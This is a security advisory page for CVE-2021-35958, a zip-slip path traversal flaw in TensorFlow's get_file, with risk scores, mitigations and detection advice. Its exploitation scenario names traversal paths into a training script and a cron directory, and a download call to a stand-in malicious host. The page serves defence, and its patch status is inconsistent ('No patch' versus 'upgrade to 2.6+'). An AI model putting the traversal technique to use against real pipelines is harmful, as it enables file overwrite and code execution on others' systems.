CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite

CRITICAL PoC AVAILABLE
Published June 30, 2021
CISO Take

Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.

Risk Assessment

Critical (CVSS 9.1). No authentication or user interaction required — attackers need only serve a malicious archive at a URL fetched by the ML pipeline. The file overwrite primitive elevates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, making the attack surface broader than in typical application CVEs. Vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.

Affected Systems

Package Ecosystem Vulnerable Range Patched
tensorflow pip No patch
195.0K OpenSSF 7.2 3.7K dependents Pushed today 4% patched ~1372d to patch Full package profile →

Do you use tensorflow? You're affected.

Severity & Risk

CVSS 3.1
9.1 / 10
EPSS
1.1%
chance of exploitation in 30 days
Higher than 78% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C None
I High
A High

Recommended Action

6 steps
  1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.

  2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review.

  3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.

  4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.

  5. Implement file integrity monitoring on model artifacts and training data directories.

  6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system use by external parties and third-party AI tools
NIST AI RMF
MS-2.5 - AI Software and Third-Party Component Risk Management
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2021-35958?

Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.

Is CVE-2021-35958 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.

How to fix CVE-2021-35958?

1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes. 2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review. 3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names. 4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories. 5. Implement file integrity monitoring on model artifacts and training data directories. 6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.

What systems are affected by CVE-2021-35958?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.

What is the CVSS score for CVE-2021-35958?

CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.09%.

Technical Details

NVD Description

TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives

Exploitation Scenario

An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event — achieving persistent code execution on ML infrastructure with the pipeline's credentials and network access.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Timeline

Published
June 30, 2021
Last Modified
November 21, 2024
First Seen
June 30, 2021

Related Vulnerabilities